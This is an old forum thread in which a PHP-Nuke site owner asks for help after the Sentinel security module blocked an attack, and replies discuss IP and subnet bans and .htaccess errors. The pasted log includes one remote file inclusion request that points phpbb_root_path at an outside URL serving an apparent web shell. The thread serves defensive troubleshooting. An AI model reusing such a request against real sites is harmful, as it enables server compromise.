Hacking attempt & 500 Internal Server error

Hangin' Around Joined: Nov 29, 2005 Posts: 47

Hi guys.

I got an email notifying me that someone had made an attack on my website, specifically my forums & that Sentinel had repelled them. Good job Very Happy

However, after the attempted intrusion my website suffered a "500 - Internal Server Error" everytime someone tried to connect.

The email did shed some light onto the problem (which I've posted below) but I can access the website fine if I delete the .htaccess.

Quote:

Date & Time: 2006-09-29 03:47:25 BST GMT +0100
Blocked IP: 72.20.3.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Query String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Get String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Post String: noegoclan.co.uk/web/modules.php
Forwarded For: none
Client IP: none
Remote Address: 72.20.3.58
Remote Port: 3277
Request Method: GET
--------------------
Who-Is for IP
72.20.3.58

As you can see they tried to use some kind of trojan script in a text file.

*WARNING* I'd not advise anyone to visit the url included in the email as my anti-virus picked it up & blocked it so be aware.

Also, the only thing in my .htaccess file is the IP of the attacker, nothing else.

Quote:

deny from 72.20.3

In Sentinel I have it set to "Admin - HTTPAuth".

If I delete the .htacess from my website it works perfect, but before the attack it worked great & not had any problem. IS there something else wrong that is casuing the error?

Thanks for any help as I'm not a website guru & value the help. Smile

Sells PC To Pay For Divorce Joined: Posts: 5661

kick out the ip..
72.20.3

that doesnt exist and is incomplete.

Posted: Fri Sep 29, 2006 9:27 am

The IP blocking config in Sentinel is set to:

Quote:

1 Octet (127.3.4.*)

Should I change it to full IP or add in the full IP of the hacker instead as I do have that?

I have Sentinel also set to write to .htaccess when someone is blocked but should I set it to not to write to .htacess? Will the IP still be blocked if not??

Involved Joined: Dec 27, 2005 Posts: 296

Hmm, I could be mistaken, but I think it's safer to leave the sub-net included in bans.
The banned IP will still be in the database too after you delete it from the htaccess file.

Posted: Fri Sep 29, 2006 9:41 am

I'm starting to think that my webhost doesn't like the use of .htaccess if I remember correctly.

I might need to alter my Sentinel settings to not write to .htaccess when an attack is logged & leave it included in the database.

So should I use Full IP or only partial?

registered · Posted: Fri Sep 29, 2006 11:35 am

That subnet seems to be owned by Staminus Communications, a US company.
My guess is that it is just one hacked server. So you probably can just ban the specific IP - 72.20.3.58

If it were known hacker groups, say in Turkey or Russia, I would have recommended banning the entire ISP subnet.

Posted: Fri Sep 29, 2006 1:28 pm

Cheers guys, I'll ban the specific user.

Is it easy to ban specific ranges of IP's for countries?Bearing in mind that I can't use .htaccess

Posted: Fri Sep 29, 2006 1:35 pm

Cannot use htaccess?
If thats so i suggest you get another host..

Posted: Sun Oct 01, 2006 9:26 pm

Yes it is easy to ban the entire country using Sentinel.
I don't know if .htaccess is being written too as well, but it is quite useful to ban on the server level. That would stop them from accessing anything on your site. Sentinel bans w/o .htaccess would only protect scripts running through phpNuke